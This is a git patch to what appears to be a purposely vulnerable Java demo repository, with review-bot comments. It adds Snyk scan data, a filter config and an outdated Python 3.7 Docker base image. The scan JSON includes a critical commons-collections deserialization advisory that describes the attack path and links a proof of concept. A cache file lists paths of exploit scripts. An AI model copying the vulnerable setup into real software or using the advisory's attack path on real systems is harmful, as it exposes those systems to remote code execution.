From 4b11ae9a8370eb5cb8c5fc3ae8a8d0f9179fd4b2 Mon Sep 17 00:00:00 2001
From: dollav <146855949+dollav@users.noreply.github.com>
Date: Tue, 4 Mar 2025 08:55:34 -0500
Subject: [PATCH] lgtm
lgtm
---
.dccache | 1 +
.vscode/settings.json | 3 +-
Dockerfile | 6 +-
html.html | 493 +++++
log4shell-goof/log4shell-server/filter.yaml | 5 +
.../log4shell-server/filtered_data.json | 735 +++++++
log4shell-goof/log4shell-server/pom.xml | 10 +-
log4shell-goof/log4shell-server/result.json | 1778 +++++++++++++++++
log4shell-goof/log4shell-server/result22.json | 1778 +++++++++++++++++
log4shell-goof/log4shell-server/settings.xml | 13 +
testDOcker | 6 +
todolist-goof/{pom.xml => test-pom.xml} | 0
todolist-goof/todolist-core/.snyk | 19 +
todolist-goof/todolist-core/pom.xml | 6 +-
14 files changed, 4840 insertions(+), 13 deletions(-)
create mode 100644 .dccache
create mode 100644 html.html
create mode 100644 log4shell-goof/log4shell-server/filter.yaml
create mode 100644 log4shell-goof/log4shell-server/filtered_data.json
create mode 100644 log4shell-goof/log4shell-server/result.json
create mode 100644 log4shell-goof/log4shell-server/result22.json
create mode 100644 log4shell-goof/log4shell-server/settings.xml
create mode 100644 testDOcker
rename todolist-goof/{pom.xml => test-pom.xml} (100%)
create mode 100644 todolist-goof/todolist-core/.snyk
diff --git a/.dccache b/.dccache
new file mode 100644
index 0000000000..6e29e74a9f
--- /dev/null
+++ b/.dccache
@@ -0,0 +1 @@
+{"/Users/austindoll/Documents/GitHub/java-goof/html.html":[14127,1731615925112.2375,"1cd39ebace4e366330db5636b2153eaa124f93b09658646ac9dc7ed87cfd3418"],"/Users/austindoll/Documents/GitHub/java-goof/pom.xml":[847,1736357283533.9795,"da6ee224cb97110767ecdfd388ff49d09c79cabb83148cbc3c2d00247a99d5a9"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/pom.xml":[1267,1727108004837.6245,"9b760e3a00be740cea3ab01cafcef373c9d916e66523130761de7849b6fd4b48"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/test-pom.xml":[3789,1707749068011.1064,"ca348a55eee0c2c6b76fd19daa5001a2ae8a74f7584132d07f7fcc5b9d81a1cd"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/web.xml":[163602,1707749068031.4702,"14fbfdf6f89135f18a36425670fc0549a5919415639b72448f1301858000e7c1"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/pom.xml":[1522,1707749068001.598,"849085e013ad19cc95f39178fa254c7e98c69c7539550bfc12ed4dfe163a25de"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/pom.xml":[3623,1727961465852.6384,"f5294611a4a8bb2d438872634d5b88224dfbd5e5845ec9ec1b18998523260b54"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/settings.xml":[493,1727181223648.331,"0576ecaf2c3ff965846b2e00a6d9e1aa480da587cc802485a60ffd8fb5b3c641"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/exploits/zip-slip.py":[408,1707749068007.4468,"a818fc2527938e1da045c776d60ba3816f6895a2cc3c704d533f6a18376bebf1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/.snyk":[668,1736363959894.3958,"55907a82b23e72e1f90498c52ec77d6005ed9424e3e526222f05f31843b4865e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/pom.xml":[4148,1728324667956.4253,"1e1afe4ec63885225a2423f7f63db64ce0557e6dea7cc3d14610ff85a64c7f52"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/pom.xml":[2430,1707749068020.6174,"71757d958b575723f0010daa01
d6e579df879a16c7160f779c0f92102af5b894"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/pom.xml":[3468,1707749068023.351,"61ef52abd4ad31c5cbdf91d0ed533c96dd7fb2d6bebdabf4a625a4fd6fc80c55"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/exploits/tomcat-rce/exploit.py":[6127,1707749068006.9976,"1044e4d9d2f0035f2a1ceb0d9cb6f2b290917ee311d7e605352b4d982547bb98"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/about.html":[4688,1707749068013.4434,"e0396d1712516cf3a477e7143c8be27c608da18c6929d07d4dfae0043ecf5f51"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/account.html":[10141,1707749068013.62,"7bfc9a8f3e554519afa0483021bda4f0e1340444e41579d03cf42b9e73a445ec"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/createTodo.html":[5494,1707749068013.7979,"7fb7501b2dfc287ea26b53e44154eb91f1256a347d9d578ca6a34b100e6b4299"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/home.html":[16033,1707749068013.969,"20d27904c27c8a764dbdf142006895805d3d27b4b428e63cdcea81450b561031"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/index.html":[2636,1707749068014.067,"104bbef8fe73eb729f086317f1c7b16e4ead3eecb1aa7431728c9bba4a59e02e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/login-error.html":[3404,1707749068014.147,"92e9656c27429357777f74cb85c7446168962ea38ff4cc906c02696694e0f30b"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/login.html":[3201,1707749068014.241,"a547c1172ac5214ec936a5bcfc2f7ae8375eca78e19a86c58add1d0a37262a3f"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/register.html":[4215,1707749068014.373,"1eb6f41a808801f5881fc573e7110e6ad682ca17d8126609025e73e67a69b2a8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/searchTodo.html":[11497,1707749068014.504
,"0dd8ffc0a703279252eff55566765326701d297c34bc4d721912b6c6224d81a5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/updateTodo.html":[6468,1707749068016.7961,"aeea0bd71e519e04d3aa60cfe27868803f07bb19f4c9212fb90d1bf0ff6af714"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/src/main/java/Main.java":[1581,1707749068001.87,"771ba599971e26873da00309f2e5f2d764fcc0edbe2d1c345841891aa3588a26"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Evil.java":[496,1707749068002.8047,"51919d812e029ba3072f606a02420fc15bf479506dfe8075a7042adca8923993"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Server.java":[7682,1707749068002.9707,"190e04c4ba5e3750e4fb8ff2f87c06b88a9b2cd7403ddb9458c9d4d3072d0aff"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Vandalize.java":[632,1707749068003.0623,"691d442e5a144bc4cc10204ebbf253abfa45ec13699d87b806c503b435850dc5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/resources/struts.xml":[8029,1707749068025.5425,"34c773e0dfa168a8d9947cf3e0fd13282fde503cadd3dd959b72c2cae8afe72e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/bootstrap-datepicker.js":[11683,1707749068016.2554,"b03662f2b02be2cb7bcc3c387ef24a950414103b056d8d6c6ff461b8f4d7b01c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/bootstrap.min.js":[28631,1707749068016.3838,"a515a82292b34bdde3447113634d5d496039ffd4d6a0c7382586f3c24e582645"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/jquery-1.10.2.min.js":[93107,1707749068016.646,"0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/persistence.xml":[766,1707749068019.1663
,"5fd1eca212d0b30f490d98338bf56550394060c0c4342a1bcf6ad6643b787428"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/web.xml":[1316,1707749068028.074,"e3525f343fa0a2fe1f3dfea1bcddb69649d71eae9bda52ae2b118113f6cb574a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/application-context.xml":[868,1707749068019.3025,"b60c87281e4808b5d0f12a314c51d7cd44dd0a057a2378f925deb2e7b13f3d5e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/infrastructure-context.xml":[2335,1707749068019.3816,"c9a996e921025ae765b092e5739a03af219548a902852670444144d09d58f194"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/about.jsp":[1868,1707749068025.8013,"eedab2c226de89d4d4d85f9ed044d628cf6070e616ad29e9f03f83752656a691"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/error.jsp":[653,1707749068026.3748,"6106cdf7b628fa2aac9a04a3d268be6f60f3d5dc1ab9a1d336f54bbbd74f6174"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/index.jsp":[1861,1707749068026.4595,"01dc1dd68bb95ee1f99ef396b6fcb8a098c5f911d581a4885a8be4fc87ebd91a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap-datepicker.js":[11683,1707749068030.258,"b03662f2b02be2cb7bcc3c387ef24a950414103b056d8d6c6ff461b8f4d7b01c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap.min.js":[28631,1707749068030.3862,"a515a82292b34bdde3447113634d5d496039ffd4d6a0c7382586f3c24e582645"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/jquery-1.10.2.min.js":[93107,1707749068031.0234,"0ba081f546084bd5097aa8a73c75931d
5aa1fc4d6e846e53c21f98e6a1509988"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/create.jsp":[2544,1707749068026.6067,"b2b33b8980b011d4968751de2f7a9850115f7ab9a56bb49e7dea24fc3c973e23"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/search.jsp":[4454,1707749068026.7534,"1cb05693027f12118e9512a3e01a3f921b84f59e00a77ce94c059acf9db13dc2"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/update.jsp":[3605,1707749068027.0662,"c449f35943ee90d512149c3d1b26347c3750c1859fc8c537b4f0d10606ba4700"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/upload.jsp":[1466,1707749068027.223,"0597d3a625750805184ddeccbe1f494128c4964ff6239e547159c624b7e59e0a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/account.jsp":[7316,1707749068027.4456,"3a06613691bab220ee216c8e5774adbedd84ced7e595109291293c3ad28ed49c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/files.jsp":[1585,1707749068027.5571,"461382d325567c4c669cef5176148d9e14be127fc4793652542612e372eb5432"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/home.jsp":[4828,1707749068027.7083,"b0cd89cd2c9d5a9dacb4e285ff924078315d9c937d6ea1a3605a538bbe05b0eb"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/login.jsp":[2108,1707749068027.8154,"fef8f3f5c975a6a4912b5708b8b5cd3409b6d749569f7eca1d7b9f7793f8766a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/register.jsp":[3249,1707749068027.9233,"5495c3acf8521dc6e68b66fb1e68ce835316d11cebf02d73e2407b
23dd5f1dc9"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/Statics.java":[302,1707749068017.4575,"faf8ae30c8c00074f924d68192efea8ddf173d772e3857987eebc8474af8a025"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/TodoServiceTest.java":[2061,1707749068020.2898,"97a4d9a387a2b063bed68c376282b7844fd77e1a1ab6bfa9f566fb6c66815ab3"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/UserServiceTest.java":[1911,1707749068020.393,"f08674cb5b00b45c4f2c0f5478b62a8d6da2e610ebf928d95d0f162ccf6b25f1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Priority.java":[1400,1707749068017.6262,"fbcf56cefa0166697104dc80f3cd9454e0a9ed64f32bf1f51b8ff52c61ade443"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Todo.java":[5142,1707749068017.7947,"e511ab0dcf0d6d60e2a08912558a03d2f3c2b4246cb374fc899c7375707a8ba6"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/User.java":[2744,1707749068017.8948,"82a4b1757798282d230b769625371b91f2a8892ad313f088159147548a511ce1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/TodoRepository.java":[2606,1707749068018.112,"a4b3b4808634f298057a0a480b55a279d4387af97bf285ecaf674dfea43184e1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/UserRepository.java":[2317,1707749068018.204,"dd3a1c73160008585fac38906516ee38a4c1ef58b1d8dca35b3c62a160318178"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/TodoService.java":[2585,1707749068018.6
626,"2633068fbc59901a47a3a3bc9ae24be71a1f89f5bcbab9b88a69fdce4aa77b14"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/UserService.java":[2298,1707749068018.7725,"3dca704e01dcd28b8745421c21b4dc83f89020f5a0806f166bfee124f476a1b8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/TodoRepositoryImpl.java":[3171,1707749068018.3552,"80a2b851d940654643a460c2caae7ae6c2388353e7f9f50ae7c00df84cff1b57"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/UserRepositoryImpl.java":[3163,1707749068018.4534,"78b6b47b4356741a6f46104bade197655e9dd6064821d8bce20fd555f97880b5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/TodoServiceImpl.java":[2798,1707749068018.8906,"ff7c4f6a14b51f6918b875849eba94d08cd041ea4262a5ba232f4c4724e3a117"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/UserServiceImpl.java":[2591,1707749068018.9702,"d44ca42fecf28dfe4c6a0ecc2a0bfacde4c97fffde20fe876a8fd1fce6184c97"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/AboutAction.java":[1593,1707749068023.9092,"aac0c815b65e7aa372635e13a1874b97404796162fdab3c8a2db8ccc665bfb77"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/BaseAction.java":[2755,1707749068024.01,"818c334580003a9059f8b9e343eee5527397c1cd54408a278c1e42c1c498af03"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/IndexAction.java":[1474,1707749068024.1094,"2b1fe3a7d1afc307195a1803b64955b233d41e26a0d5b38b8029c794ed5f0463"],"
/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/interceptor/LoginInterceptor.java":[2204,1707749068025.1648,"b4ae8f17a0cc66a14234de9f635874e100546098e5e67b7999beade579019b15"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/ChangePasswordForm.java":[2569,1707749068021.3772,"f1b0c8025daf900938caf746a85fe7df9cfeef0b85e7525eecc345daddacec83"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/LoginForm.java":[2097,1707749068021.4858,"303ba1f62ae2a9251c7fd1e1132bc91c6dbeacb760f0f8bad4d8f802b48bf4c7"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/RegistrationForm.java":[2783,1707749068021.578,"65958478e6c6df53811e97bd5a0e54489272be2e06bfb3a14641922c11e1dc1c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/HighlightTag.java":[3515,1707749068021.8755,"67df60f194c628b276134716f0d43d102d18a4ffdc5bcbd4afe834ad50f8af28"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/PriorityIconTag.java":[2167,1707749068022.0413,"b24e9381e1690b8c0ca9535c6fd50d472311f00bd520b4ceadd98d2b5ce80d85"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusLabelTag.java":[2085,1707749068022.2034,"af0925afa455c491d83245a16a39c98ac8fec45b4b035070a15d60ef47cfe074"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusStyleTag.java":[2105,1707749068022.3518,"82c42e37d2c6c02fc69297379a8183dd8bc8bbd80d29fca2a0868e7a532a1f95"],"/Users/
austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/util/TodoListUtils.java":[4018,1707749068022.542,"a743f24c83b6992948cb46bf8b2bd4d4b1c11dfd41a81c66c584d80d3b77e0a4"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/SearchTodoAction.java":[2347,1707749068024.2808,"23c393191001a8548c66a6112786261fd8821fea6ecbcbaded85ffc695c65499"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/TodoAction.java":[4174,1707749068024.5068,"f779cf49f727c3a070c3e17ecb29d4d1c8cc9844158393e7baad575f86c9f311"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java":[11846,1734026546247.283,"70d6b7ad7b556b98b17dd858b269daed067f4d0f4b6f2d7079c599e469d86168"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/FilesAction.java":[2536,1707749068024.7944,"e47d909ef3e3a224f723c2dbdd6b35ee131064090570cdcf3ec0a514efa8767d"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/HomeAction.java":[2513,1707749068024.883,"142a48bf4f5665546d1168347897fac76cae74d361f9f6a9476c6b90d8c3dc12"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/SessionAction.java":[3351,1707749068024.9883,"25a2fbf3e1485401fe11418e42e76149b0f2ec38a1a6dc3dde038be9e0be28d9"]}
\ No newline at end of file
diff --git a/.vscode/settings.json b/.vscode/settings.json
index e0f15db2eb..64d656bf15 100644
--- a/.vscode/settings.json
+++ b/.vscode/settings.json
@@ -1,3 +1,4 @@
{
- "java.configuration.updateBuildConfiguration": "automatic"
+ "java.configuration.updateBuildConfiguration": "automatic",
+ "snyk.advanced.organization": "f40682bc-241b-4e08-8320-28b3bd169ec9"
}
\ No newline at end of file
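Review bot: The new `snyk.advanced.organization` entry pins every contributor's IDE scans to one specific Snyk organization id, which is a per-account setting rather than a property of the project; presumably this is the author's own org. Shared `.vscode/settings.json` is read by everyone who opens the workspace, so a different contributor's extension will either scan against an org they cannot access or silently report into the wrong one. If the id is meant to be shared, a one-line comment-equivalent is not possible in strict JSON, so the README should say which org it refers to; otherwise keep this key in user settings and leave only `"java.configuration.updateBuildConfiguration": "automatic"` here. The file also still ends without a trailing newline, which this hunk could have fixed.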
diff --git a/Dockerfile b/Dockerfile
index 197a015e39..5d1c25366c 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,6 +1,4 @@
-From python:3.10.12-slim
+FROM python:3.7-slim-bullseye
RUN apt-get update
-RUN apt-get install libkrb5support0 -y
-
-RUN ["sleep", "1"]
+RUN apt install linux-libc-dev
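Review bot: `RUN apt install linux-libc-dev` on the last line has no `-y`, so a non-interactive `docker build` stops at the "Do you want to continue?" prompt and the step fails; `apt` also warns that it has no stable CLI for use in scripts, so `apt-get` is the right front end here. The `apt-get update` on the context line above is a separate layer, so a cached index can be reused against a later install and pull stale package versions. Both are addressed by collapsing the two steps into one layer: `RUN apt-get update && apt-get install -y --no-install-recommends linux-libc-dev && rm -rf /var/lib/apt/lists/*`. The base image also moves from `python:3.10.12-slim` to `python:3.7-slim-bullseye`; Python 3.7 reached end of life in June 2023 and receives no further fixes, so if the downgrade is deliberate (this repository appears to be a purposely vulnerable demo) a comment such as `# intentionally outdated base image for demo purposes` would save the next reader from "fixing" it.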
diff --git a/html.html b/html.html
new file mode 100644
index 0000000000..2073345708
--- /dev/null
+++ b/html.html
@@ -0,0 +1,493 @@
+
+
+
+
+
+
+
+
+ Snyk test report
+
+
+
+
+
+
+
+
+
+
+
+
+
+ No known vulnerabilities detected.
+
+
+
+
+
+
diff --git a/log4shell-goof/log4shell-server/filter.yaml b/log4shell-goof/log4shell-server/filter.yaml
new file mode 100644
index 0000000000..6824479d53
--- /dev/null
+++ b/log4shell-goof/log4shell-server/filter.yaml
@@ -0,0 +1,5 @@
+version: 2
+customFilters:
+ filter: ".vulnerabilities |= map(if (.disclosureTime < (now - (3000 * 86400) | todateiso8601)) then . else empty end)"
+ pass: "[.vulnerabilities[] | select(.severity == \"low\")] | length"
+ msg: "Vulnerabilities found"
\ No newline at end of file
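Review bot: The `pass` expression on the fourth line ends in `| length`, so it yields a count rather than a true/false result, and it only counts findings whose severity is `low`; critical and high results never affect the gate at all, even though the other files in this patch carry a critical commons-collections entry. Assuming snyk-filter evaluates `pass` as a boolean, the intent is made explicit with `pass: "[.vulnerabilities[] | select(.severity == \"critical\" or .severity == \"high\")] | length == 0"`. The `filter` line keeps only entries whose `.disclosureTime` is earlier than 3000 days (roughly 8.2 years) before `now` and drops everything newer, which is the opposite of what a "suppress stale findings" filter would do; if recent disclosures are what should be surfaced, flip the comparison to `>`. A short comment above `customFilters:` stating which direction is intended would make the policy reviewable without re-deriving the jq.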
diff --git a/log4shell-goof/log4shell-server/filtered_data.json b/log4shell-goof/log4shell-server/filtered_data.json
new file mode 100644
index 0000000000..09649c3730
--- /dev/null
+++ b/log4shell-goof/log4shell-server/filtered_data.json
@@ -0,0 +1,735 @@
+{
+ "vulnerabilities": [
+ {
+ "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078",
+ "title": "Deserialization of Untrusted Data",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[3.0,3.2.2)"
+ ]
+ },
+ "exploit": "High",
+ "fixedIn": [
+ "3.2.2"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9.8,
+ "functions": [
+ {
+ "version": [
+ "[3,3.2.2)"
+ ],
+ "functionId": {
+ "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java",
+ "className": "InvokerTransformer",
+ "functionName": "transform"
+ }
+ }
+ ],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "commons-collections:commons-collections",
+ "references": [
+ {
+ "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/",
+ "title": "FoxGloveSecurity Blog"
+ },
+ {
+ "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580",
+ "title": "Jira Issue"
+ },
+ {
+ "url": "https://github.com/ianxtianxt/CVE-2015-7501",
+ "title": "PoC"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9.8,
+ "modificationTime": "2024-03-11T09:46:27.924934Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "cvssV3BaseScore": 7.3,
+ "modificationTime": "2024-03-11T09:52:38.421377Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:09:40.078866Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.0",
+ "modificationTime": "2024-03-11T09:46:27.924934Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "assigner": "Red Hat",
+ "severity": "high",
+ "baseScore": 7.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:52:38.421377Z"
+ }
+ ],
+ "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
